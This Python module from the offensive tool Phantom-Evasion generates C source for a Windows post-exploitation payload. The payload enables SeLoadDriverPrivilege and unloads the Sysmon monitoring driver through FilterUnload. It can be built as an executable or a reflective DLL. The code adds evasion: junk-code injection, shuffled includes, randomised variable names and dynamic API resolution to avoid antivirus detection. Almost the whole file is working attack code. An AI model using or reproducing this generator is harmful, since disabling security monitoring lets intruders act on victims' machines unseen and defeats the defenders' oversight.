
     ########################################################################################
     #                                                                                      #
     #    This file is part of Phantom-Evasion.                                             #
     #                                                                                      #
     #    Phantom-Evasion is free software: you can redistribute it and/or modify           #
     #    it under the terms of the GNU General Public License as published by              #
     #    the Free Software Foundation, either version 3 of the License, or                 #
     #    (at your option) any later version.                                               #
     #                                                                                      #
     #    Phantom-Evasion is distributed in the hope that it will be useful,                #
     #    but WITHOUT ANY WARRANTY; without even the implied warranty of                    #
     #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                     #
     #    GNU General Public License for more details.                                      #
     #                                                                                      #  
     #    You should have received a copy of the GNU General Public License                 #
     #   along with Phantom-Evasion.  If not, see <http://www.gnu.org/licenses/>.           #
     #                                                                                      #
     ########################################################################################

import sys
sys.path.append("Modules/payloads/auxiliar")
from usefull import varname_creator
from usefull import JunkInjector
from usefull import WindowsDefend
from usefull import IncludeShuffler
#from usefull import WindowsDecoyProc
#from usefull import CloseDecoyProc
from usefull import WriteSource

def Postex_C_UnloadSysmonDriver_windows(ModOpt):

    RandhToken = varname_creator()
    RandTokenPriv = varname_creator()
    RandLuid = varname_creator()
    NdcFilterUnload = varname_creator()

    Ret_code = ""

    IncludeList = ["#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <math.h>\n","#include <time.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":
        
        if ModOpt["Reflective"] == True:
            
            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        ModOpt["AdvapiHandle"] = varname_creator()
        
        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["AdvapiHandle"] + " = GetModuleHandle(\"advapi32.dll\");\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "HANDLE " + RandhToken + ";\n"

    if ModOpt["DynImport"] == True:

        NdcOPT = varname_creator()
        NdcATP = varname_creator()
        NdcLPV = varname_creator()

        Ret_code += "FARPROC " + NdcOPT + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"OpenProcessToken\");\n"
        Ret_code += "if(" + NdcOPT + "(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
        Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
        Ret_code += "LUID " + RandLuid + ";\n"
        Ret_code += "FARPROC " + NdcLPV + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"LookupPrivilegeValue\");\n"
        Ret_code += "if(" + NdcLPV + "(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
        Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
        Ret_code += "FARPROC " + NdcATP + " = GetProcAddress(" + ModOpt["AdvapiHandle"] + ",\"AdjustTokenPrivileges\");\n"
        Ret_code += "if(" + NdcATP + "(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"
    else:
        Ret_code += "if(OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&" + RandhToken + ")){\n"
        Ret_code += "TOKEN_PRIVILEGES " + RandTokenPriv + ";\n"
        Ret_code += "LUID " + RandLuid + ";\n"
        Ret_code += "if (LookupPrivilegeValue(NULL,\"SeLoadDriverPrivilege\",&" + RandLuid + ")){\n"
        Ret_code += RandTokenPriv + ".PrivilegeCount = 1;\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Luid = " + RandLuid + ";\n"
        Ret_code += RandTokenPriv + ".Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;\n"
        Ret_code += "if(AdjustTokenPrivileges(" + RandhToken + ",FALSE,&" + RandTokenPriv + ",sizeof(TOKEN_PRIVILEGES),(PTOKEN_PRIVILEGES)NULL,(PDWORD)NULL)){\n"

    Ret_code += "FARPROC " + NdcFilterUnload + " = GetProcAddress(GetModuleHandle(\"fltlib.dll\"),\"FilterUnload\");\n"
    Ret_code += "HRESULT unload = " + NdcFilterUnload + "(\"SysmonDrv\");}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],False)

    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":
        
        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c",Ret_code)


